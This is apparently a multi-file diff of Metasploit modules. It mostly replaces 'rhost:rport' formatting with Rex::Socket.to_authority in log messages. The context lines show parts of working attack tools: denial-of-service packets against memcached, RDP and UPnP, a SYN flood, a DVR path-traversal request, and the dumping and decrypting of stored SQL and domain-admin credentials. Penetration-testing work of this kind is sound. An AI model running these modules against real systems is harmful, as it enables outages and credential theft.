+      print_error("#{Rex::Socket.to_authority(rhost, rport)}#{target_uri} does not appear to be running WordPress")
       return
     end
 

--- a/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_long_password_dos.rb
@@ -88,7 +88,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     unless wordpress_and_online?
-      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)}#{target_uri} does not appear to be running WordPress")
       return
     end
 

--- a/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
+++ b/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
 
     size = Random.new.rand(336...1472)
     pkt = Random.new.bytes(size)
-    print_status("Sending random datagram of #{size} bytes to #{rhost}:#{rport}...")
+    print_status("Sending random datagram of #{size} bytes to #{Rex::Socket.to_authority(rhost, rport)}...")
     udp_sock.put(pkt)
 
     disconnect_udp

--- a/modules/auxiliary/dos/misc/memcached.rb
+++ b/modules/auxiliary/dos/misc/memcached.rb
@@ -49,17 +49,17 @@ class MetasploitModule < Msf::Auxiliary
     pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
     pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 
-    print_status("#{rhost}:#{rport} - Sending dos packet...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending dos packet...")
     sock.put(pkt)
     disconnect
 
-    print_status("#{rhost}:#{rport} - Checking host status...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking host status...")
     select(nil, nil, nil, 1)
 
     if is_alive?
-      print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - The DoS attempt did not work, host is still alive")
     else
-      print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Tango down") # WWJS - What would th3j35t3r say?
     end
   end
 end

--- a/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb
+++ b/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
     data << '</SOAP-ENV:Envelope>'
 
     begin
-      vprint_status("#{rhost}:#{rport} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}")
       res = send_request_cgi({
         'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
@@ -95,14 +95,14 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       if res && (res.code == 200) && res.body =~ (/EPS_DELETE_FILE.Response/) && res.body.include?(datastore['FILENAME']) && res.body.include?(datastore['DIRNAME'])
-        print_good("#{rhost}:#{rport} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted")
       elsif res
-        vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s)
-        vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s)
-        vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response code: " + res.code.to_s)
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response message: " + res.message.to_s)
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response body: " + res.body.to_s) if res.body
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end

--- a/modules/auxiliary/dos/scada/d20_tftp_overflow.rb
+++ b/modules/auxiliary/dos/scada/d20_tftp_overflow.rb
@@ -66,10 +66,10 @@ class MetasploitModule < Msf::Auxiliary
     if recv && !recv.empty?
       udp_sock.sendto(payload, rhost, rport)
     else
-      print_error "#{rhost}:#{rport} - TFTP - No response from the target, aborting."
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} - TFTP - No response from the target, aborting."
       return
     end
-    print_good "#{rhost}:#{rport} - TFTP - DoS complete, the D20 should fault after a timeout."
+    print_good "#{Rex::Socket.to_authority(rhost, rport)} - TFTP - DoS complete, the D20 should fault after a timeout."
   end
 
   def recv_timeout

--- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb
+++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
 
     disconnect
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    print_status("Couldn't connect to #{rhost}:#{rport}")
+    print_status("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::EOFError
     print_status('Sendmail stopped responding after sending trigger - target vulnerable.')
   end

--- a/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
+++ b/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
     fragments << build_tls_fragment(1, 1234, 0, 0, 123, Rex::Text.rand_text_alpha(1234))
     message = build_tls_message(22, datastore['VERSION'], 0, 0, fragments)
     connect_udp
-    print_status("#{rhost}:#{rport} - Sending fragmented DTLS client hello packet")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending fragmented DTLS client hello packet")
     udp_sock.put(message)
     disconnect_udp
   end

--- a/modules/auxiliary/dos/tcp/synflood.rb
+++ b/modules/auxiliary/dos/tcp/synflood.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
     sent = 0
     num = datastore['NUM'] || 0
 
-    print_status("SYN flooding #{rhost}:#{rport}...")
+    print_status("SYN flooding #{Rex::Socket.to_authority(rhost, rport)}...")
 
     p = PacketFu::TCPPacket.new
     p.ip_saddr = srchost

--- a/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
+++ b/modules/auxiliary/dos/upnp/miniupnpd_dos.rb
@@ -77,30 +77,30 @@ class MetasploitModule < Msf::Auxiliary
     # connect to the UDP port
     connect_udp
 
-    print_status("#{rhost}:#{rport} - Checking UPnP...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking UPnP...")
     response = send_probe(udp_sock, msearch_probe)
     if response.nil?
-      print_error("#{rhost}:#{rport} - UPnP end not found")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - UPnP end not found")
       disconnect_udp
       return
     end
 
     (1..datastore['ATTEMPTS']).each do |attempt|
-      print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - UPnP DoS attempt #{attempt}...")
 
       # send the exploit to the target
-      print_status("#{rhost}:#{rport} - Sending malformed packet...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending malformed packet...")
       udp_sock.put(sploit)
 
       # send the probe to the target
-      print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - The target should be unresponsive now...")
       response = send_probe(udp_sock, msearch_probe)
       if response.nil?
-        print_good("#{rhost}:#{rport} - UPnP unresponsive")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - UPnP unresponsive")
         disconnect_udp
         break
       else
-        print_status("#{rhost}:#{rport} - UPnP is responsive still")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - UPnP is responsive still")
       end
     end
 

--- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
+++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
@@ -45,9 +45,9 @@ class MetasploitModule < Msf::Auxiliary
     c = connect(o)
     c.send_request(c.request_raw(o))
 
-    print_status("Request sent to #{rhost}:#{rport}")
+    print_status("Request sent to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-    print_status("Couldn't connect to #{rhost}:#{rport}")
+    print_status("Couldn't connect to #{Rex::Socket.to_authority(rhost, rport)}")
   rescue ::Timeout::Error, ::Errno::EPIPE => e
     vprint_error(e.message)
   end

--- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
+++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
@@ -140,24 +140,24 @@ class MetasploitModule < Msf::Auxiliary
           "\x21\x80" # T.125
 
     unless is_rdp_up
-      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - RDP Service Unreachable")
       return
     end
 
     connect
-    print_status("#{rhost}:#{rport} - Sending #{name}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending #{name}")
     sock.put(pkt)
     Rex.sleep(3)
     disconnect
-    print_status("#{rhost}:#{rport} - #{pkt.length} bytes sent")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{pkt.length} bytes sent")
 
-    print_status("#{rhost}:#{rport} - Checking RDP status...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking RDP status...")
 
     if is_rdp_up
-      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - RDP Service Unreachable")
       return
     else
-      print_good("#{rhost}:#{rport} seems down")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} seems down")
       report_vuln({
         host: rhost,
         port: rport,

--- a/modules/auxiliary/dos/wireshark/capwap.rb
+++ b/modules/auxiliary/dos/wireshark/capwap.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
     connect_udp
 
     # We send a packet incomplete to crash dissector
-    print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to crash wireshark capwap dissector ...")
     # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then
     # the dissector crash
     # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt

--- a/modules/auxiliary/gather/apache_rave_creds.rb
+++ b/modules/auxiliary/gather/apache_rave_creds.rb
@@ -137,67 +137,67 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    print_status("#{rhost}:#{rport} - Fingerprinting...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Fingerprinting...")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.to_s, "login"),
       'method' => 'GET',
     })
 
     if not res
-      print_error("#{rhost}:#{rport} - No response, aborting...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - No response, aborting...")
       return
     elsif res.code == 200 and res.body =~ /<span>Apache Rave ([0-9\.]*)<\/span>/
       version = $1
       if version <= "0.20"
-        print_good("#{rhost}:#{rport} - Apache Rave #{version} found. Vulnerable. Proceeding...")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Apache Rave #{version} found. Vulnerable. Proceeding...")
       else
-        print_error("#{rhost}:#{rport} - Apache Rave #{version} found. Not vulnerable. Aborting...")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Apache Rave #{version} found. Not vulnerable. Aborting...")
         return
       end
     else
-      print_warning("#{rhost}:#{rport} - Apache Rave Portal not found, trying to log-in anyway...")
+      print_warning("#{Rex::Socket.to_authority(rhost, rport)} - Apache Rave Portal not found, trying to log-in anyway...")
     end
 
     cookie = nil
     unless datastore["USERNAME"].empty? or datastore["PASSWORD"].empty?
-      print_status("#{rhost}:#{rport} - Login with the provided credentials...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Login with the provided credentials...")
       cookie = login(datastore["USERNAME"], datastore["PASSWORD"])
       if cookie.nil?
-        print_error("#{rhost}:#{rport} - Login failed")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Login failed")
       else
-        print_good("#{rhost}:#{rport} - Login Successful. Proceeding...")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful. Proceeding...")
       end
     end
 
     if cookie.nil?
-      print_status("#{rhost}:#{rport} - Login with default accounts...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Login with default accounts...")
       @default_accounts.each { |user, password|
-        print_status("#{rhost}:#{rport} - Login with the #{user} default account...")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Login with the #{user} default account...")
         cookie = login(user, password)
         unless cookie.nil?
-          print_good("#{rhost}:#{rport} - Login Successful. Proceeding...")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful. Proceeding...")
           break
         end
       }
     end
 
     if cookie.nil?
-      print_error("#{rhost}:#{rport} - Login failed. Aborting...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Login failed. Aborting...")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Disclosing information...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Disclosing information...")
     offset = 0
     search = true
 
     while search
-      print_status("#{rhost}:#{rport} - Disclosing offset #{offset}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Disclosing offset #{offset}...")
       users_data = disclose(cookie, offset)
       if users_data.nil?
-        print_error("#{rhost}:#{rport} - Disclosure failed. Aborting...")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Disclosure failed. Aborting...")
         return
       else
-        print_good("#{rhost}:#{rport} - Disclosure successful")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Disclosure successful")
       end
 
       json_info = JSON.parse(users_data)
@@ -210,11 +210,11 @@ class MetasploitModule < Msf::Auxiliary
         nil,
         "Apache Rave Users Database Offset #{offset}"
       )
-      print_status("#{rhost}:#{rport} - Information for offset #{offset} saved in: #{path}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Information for offset #{offset} saved in: #{path}")
 
-      print_status("#{rhost}:#{rport} - Recovering Hashes...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Recovering Hashes...")
       json_info["result"]["resultSet"].each { |result|
-        print_good("#{rhost}:#{rport} - Found cred: #{result["username"]}:#{result["password"]}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - Found cred: #{result["username"]}:#{result["password"]}")
         report_cred(
           ip: rhost,
           port: rport,

--- a/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
+++ b/modules/auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
     target_file = datastore['TARGET_FILE'].gsub(' ', '%20')
     url_path = "/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=#{traversal_path}#{target_file}&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
 
-    print_status("Sending request to #{rhost}:#{rport} for file: #{target_file}")
+    print_status("Sending request to #{Rex::Socket.to_authority(rhost, rport)} for file: #{target_file}")
 
     response = send_request_cgi({
       'method' => 'GET',

--- a/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
+++ b/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       if res.code == 200 && res.headers['Content-Type'] =~ %r{application/java.*}
-        print_good("Java file leak at #{rhost}:#{rport}#{normalized_url}")
+        print_good("Java file leak at ##{Rex::Socket.to_authority(rhost, rport)}#{normalized_url}")
         Exploit::CheckCode::Vulnerable("Java class file leaked at #{normalized_url}")
       else
         Exploit::CheckCode::Safe('Redirected but class file not accessible')

--- a/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
+++ b/modules/auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key.rb
@@ -65,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       if res.code == 200 && res.headers['Content-Type'] =~ %r{application/java.*}
-        print_good("Java file leak at ##{Rex::Socket.to_authority(rhost, rport)}#{normalized_url}")
+        print_good("Java file leak at #{Rex::Socket.to_authority(rhost, rport)}#{normalized_url}")
         Exploit::CheckCode::Vulnerable("Java class file leaked at #{normalized_url}")
       else
         Exploit::CheckCode::Safe('Redirected but class file not accessible')

--- a/modules/auxiliary/gather/impersonate_ssl.rb
+++ b/modules/auxiliary/gather/impersonate_ssl.rb
@@ -65,10 +65,10 @@ class MetasploitModule < Msf::Auxiliary
   def run
     if !datastore['SSLServerNameIndication'].nil?
       sni = datastore['SSLServerNameIndication']
-      print_status("Connecting to #{rhost}:#{rport} SNI:#{sni}")
+      print_status("Connecting to #{Rex::Socket.to_authority(rhost, rport)} SNI:#{sni}")
     else
       sni = false
-      print_status("Connecting to #{rhost}:#{rport}")
+      print_status("Connecting to #{Rex::Socket.to_authority(rhost, rport)}")
     end
 
     if !datastore['PRIVKEY'].nil? && !datastore['CA_CERT'].nil?
@@ -94,11 +94,11 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if !cert
-      print_error("#{rhost}:#{rport} No certificate subject or CN found")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} No certificate subject or CN found")
       return
     end
 
-    print_status("Copying certificate from #{rhost}:#{rport}\n#{cert.subject} ")
+    print_status("Copying certificate from #{Rex::Socket.to_authority(rhost, rport)}\n#{cert.subject} ")
     vprint_status("Original Certificate Details\n\n#{cert.to_text}")
 
     begin
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Auxiliary
 
     addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
 
-    print_status("Creating looted key/crt/pem files for #{rhost}:#{rport}")
+    print_status("Creating looted key/crt/pem files for #{Rex::Socket.to_authority(rhost, rport)}")
 
     p = store_loot("#{datastore['RHOST'].downcase}_key", datastore['OUT_FORMAT'].downcase, addr, priv_key, 'imp_ssl.key', 'Impersonate_SSL')
     print_good("key: #{p}")

--- a/modules/auxiliary/gather/osticket_arbitrary_file_read.rb
+++ b/modules/auxiliary/gather/osticket_arbitrary_file_read.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
       file_enc = 'plain'
     end
 
-    print_status("Target: #{rhost}:#{rport}")
+    print_status("Target: #{Rex::Socket.to_authority(rhost, rport)}")
     print_status("File to extract: #{file_path}")
 
     # Step 1: Login

--- a/modules/auxiliary/gather/trackit_sql_domain_creds.rb
+++ b/modules/auxiliary/gather/trackit_sql_domain_creds.rb
@@ -187,7 +187,7 @@ class MetasploitModule < Msf::Auxiliary
     if sock.nil?
       fail_with(Failure::Unreachable, "#{rhost}:#{rport.to_s} - Failed to connect to remoting service")
     else
-      print_status("#{rhost}:#{rport} - Sending packet to ConfigurationService...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending packet to ConfigurationService...")
     end
     sock.write(packet)
 
@@ -217,18 +217,18 @@ class MetasploitModule < Msf::Auxiliary
       if ready
         packet_reply = sock.readpartial(4096)
       else
-        print_error("#{rhost}:#{rport} - Socket timed out after 15 seconds, try again if no credentials are dumped below.")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Socket timed out after 15 seconds, try again if no credentials are dumped below.")
         break
       end
       if packet_reply =~ /Service not found/
         # This is most likely an older Numara version, re-do the packet and send again.
-        print_error("#{rhost}:#{rport} - Received \"Service not found\", trying again with new packet...")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} - Received \"Service not found\", trying again with new packet...")
         sock.close
         sock = connect
         if sock.nil?
           fail_with(Failure::Unreachable, "#{rhost}:#{rport.to_s} - Failed to connect to remoting service")
         else
-          print_status("#{rhost}:#{rport} - Sending packet to ConfigurationService...")
+          print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending packet to ConfigurationService...")
         end
         packet = prepare_packet(false)
         sock.write(packet)
@@ -247,19 +247,19 @@ class MetasploitModule < Msf::Auxiliary
     loot.each_key { |str| (loot[str] == "" ? loot[str] = nil : next) }
 
     if loot[database_type]
-      print_good("#{rhost}:#{rport} - Got database type: #{loot[database_type]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got database type: #{loot[database_type]}")
     end
 
     if loot[database_server_name]
-      print_good("#{rhost}:#{rport} - Got database server name: #{loot[database_server_name]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got database server name: #{loot[database_server_name]}")
     end
 
     if loot[database_name]
-      print_good("#{rhost}:#{rport} - Got database name: #{loot[database_name]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got database name: #{loot[database_name]}")
     end
 
     if loot[schema_owner]
-      print_good("#{rhost}:#{rport} - Got database user name: #{loot[schema_owner]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got database user name: #{loot[schema_owner]}")
     end
 
     if loot[database_pw]
@@ -269,11 +269,11 @@ class MetasploitModule < Msf::Auxiliary
       cipher.iv = 'NumaraTI'
       loot[database_pw] = cipher.update(Rex::Text.decode_base64(loot[database_pw]))
       loot[database_pw] << cipher.final
-      print_good("#{rhost}:#{rport} - Got database password: #{loot[database_pw]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got database password: #{loot[database_pw]}")
     end
 
     if loot[domain_admin_name]
-      print_good("#{rhost}:#{rport} - Got domain administrator username: #{loot[domain_admin_name]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got domain administrator username: #{loot[domain_admin_name]}")
     end
 
     if loot[domain_admin_pw]
@@ -283,7 +283,7 @@ class MetasploitModule < Msf::Auxiliary
       cipher.iv = 'NumaraTI'
       loot[domain_admin_pw] = cipher.update(Rex::Text.decode_base64(loot[domain_admin_pw]))
       loot[domain_admin_pw] << cipher.final
-      print_good("#{rhost}:#{rport} - Got domain administrator password: #{loot[domain_admin_pw]}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Got domain administrator password: #{loot[domain_admin_pw]}")
     end
 
     if loot[schema_owner] and loot[database_pw] and loot[database_type] and loot[database_server_name]
@@ -325,7 +325,7 @@ class MetasploitModule < Msf::Auxiliary
         print_error "Could not resolve Database Server Hostname."
       end
 
-      print_status("#{rhost}:#{rport} - Stored SQL credentials: #{loot[database_server_name]}:#{loot[schema_owner]}:#{loot[database_pw]}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Stored SQL credentials: #{loot[database_server_name]}:#{loot[schema_owner]}:#{loot[database_pw]}")
     end
 
     if loot[domain_admin_name] and loot[domain_admin_pw]
@@ -335,7 +335,7 @@ class MetasploitModule < Msf::Auxiliary
         domain: loot[domain_admin_name].split('\\')[0]
       })
 
-      print_status("#{rhost}:#{rport} - Stored domain credentials: #{loot[domain_admin_name]}:#{loot[domain_admin_pw]}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Stored domain credentials: #{loot[domain_admin_name]}:#{loot[domain_admin_pw]}")
     end
   end
 

--- a/modules/auxiliary/gather/xbmc_traversal.rb
+++ b/modules/auxiliary/gather/xbmc_traversal.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
         'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])
       }, 25)
     rescue Rex::ConnectionRefused
-      print_error("#{rhost}:#{rport} Could not connect.")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Could not connect.")
       return
     end
 
@@ -83,9 +83,9 @@ class MetasploitModule < Msf::Auxiliary
         )
         print_good("File saved in: #{path}")
       elsif res.code == 401
-        print_error("#{rhost}:#{rport} Authentication failed")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} Authentication failed")
       elsif res.code == 404
-        print_error("#{rhost}:#{rport} File not found")
+        print_error("#{Rex::Socket.to_authority(rhost, rport)} File not found")
       end
     else
       print_error("HTTP Response failed")

--- a/modules/auxiliary/gather/zookeeper_info_disclosure.rb
+++ b/modules/auxiliary/gather/zookeeper_info_disclosure.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue Timeout::Error, ::Rex::TimeoutError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Connection Failed...")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Connection Failed...")
     ensure
       disconnect
     end

--- a/modules/auxiliary/scanner/afp/afp_server_info.rb
+++ b/modules/auxiliary/scanner/afp/afp_server_info.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
   rescue ::Interrupt
     raise $ERROR_INFO
   rescue StandardError
-    print_error("AFP #{rhost}:#{rport} #{$ERROR_INFO.class} #{$ERROR_INFO}")
+    print_error("AFP #{Rex::Socket.to_authority(rhost, rport)} #{$ERROR_INFO.class} #{$ERROR_INFO}")
     raise $ERROR_INFO
   ensure
     disconnect

--- a/modules/auxiliary/scanner/chargen/chargen_probe.rb
+++ b/modules/auxiliary/scanner/chargen/chargen_probe.rb
@@ -56,10 +56,10 @@ class MetasploitModule < Msf::Auxiliary
         r = udp_sock.recvfrom(65535, 0.1)
 
         if r and r[1]
-          vprint_status("#{rhost}:#{rport} - Response: #{r[0]}")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Response: #{r[0]}")
           res = r[0].to_s.strip
           if res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/)
-            print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
+            print_good("#{Rex::Socket.to_authority(rhost, rport)} answers with #{res.length} bytes (headers + UDP payload)")
             report_service(host: rhost, port: rport, proto: 'udp', name: 'chargen', info: res.length)
           end
         end

--- a/modules/auxiliary/scanner/couchdb/couchdb_login.rb
+++ b/modules/auxiliary/scanner/couchdb/couchdb_login.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    vprint_status("#{rhost}:#{rport} - Trying to login with '#{user}' : '#{pass}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Trying to login with '#{user}' : '#{pass}'")
 
     uri = target_uri.path
 
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
     return if res.code == 404
 
     if [200, 301, 302].include?(res.code)
-      vprint_good("#{rhost}:#{rport} - Successful login with '#{user}' : '#{pass}'")
+      vprint_good("#{Rex::Socket.to_authority(rhost, rport)} - Successful login with '#{user}' : '#{pass}'")
     end
   rescue ::Rex::ConnectionError
     vprint_error("'#{rhost}':'#{rport}' - Failed to connect to the web server")

--- a/modules/auxiliary/scanner/db2/db2_version.rb
+++ b/modules/auxiliary/scanner/db2/db2_version.rb
@@ -53,13 +53,13 @@ class MetasploitModule < Msf::Auxiliary
     end
     disconnect
   rescue ::Rex::ConnectionRefused
-    vprint_error("#{rhost}:#{rport} : Cannot connect to host")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} : Cannot connect to host")
     return :done
   rescue ::Rex::ConnectionError
-    vprint_error("#{rhost}:#{rport} : Unable to attempt probe")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} : Unable to attempt probe")
     return :done
   rescue ::Rex::Proto::DRDA::RespError => e
-    vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}")
+    vprint_error("#{Rex::Socket.to_authority(rhost, rport)} : Error in connecting to DB2 instance: #{e}")
     return :error
   end
 end

--- a/modules/auxiliary/scanner/finger/finger_users.rb
+++ b/modules/auxiliary/scanner/finger/finger_users.rb
@@ -29,13 +29,13 @@ class MetasploitModule < Msf::Auxiliary
     @users = {}
 
     begin
-      vprint_status "#{rhost}:#{rport} - Sending empty finger request."
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending empty finger request."
       finger_empty
-      vprint_status "#{rhost}:#{rport} - Sending test finger requests."
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending test finger requests."
       finger_zero
       finger_dot
       finger_chars
-      vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users"
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending finger request for #{finger_user_common.count} users"
       finger_list
     rescue ::Rex::ConnectionError
     rescue ::Exception => e
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Auxiliary
     buff = finger_slurp_data
     if buff.scan(/\r?\nm\s/).size > 7
       @multiple_requests = true
-      vprint_status "#{rhost}:#{rport} - Multiple users per request is okay."
+      vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Multiple users per request is okay."
     end
     parse_users(buff)
     disconnect
@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary
         next if @users[user]
 
         connect
-        vprint_status "#{rhost}:#{rport} - Sending finger request for #{user}..."
+        vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending finger request for #{user}..."
         sock.put("#{user}\r\n")
         buff = finger_slurp_data
         ret = parse_users(buff)
@@ -115,7 +115,7 @@ class MetasploitModule < Msf::Auxiliary
           user_batch << new_user
         end
         connect
-        vprint_status "#{rhost}:#{rport} - Sending finger request for #{user_batch.join(", ")}..."
+        vprint_status "#{Rex::Socket.to_authority(rhost, rport)} - Sending finger request for #{user_batch.join(", ")}..."
         sock.put("#{user_batch.join(" ")}\r\n")
         buff = finger_slurp_data
         ret = parse_users(buff)
@@ -188,7 +188,7 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       if uid
-        print_good "#{rhost}:#{rport} - Found user: #{uid}" unless @users[uid] == :reported
+        print_good "#{Rex::Socket.to_authority(rhost, rport)} - Found user: #{uid}" unless @users[uid] == :reported
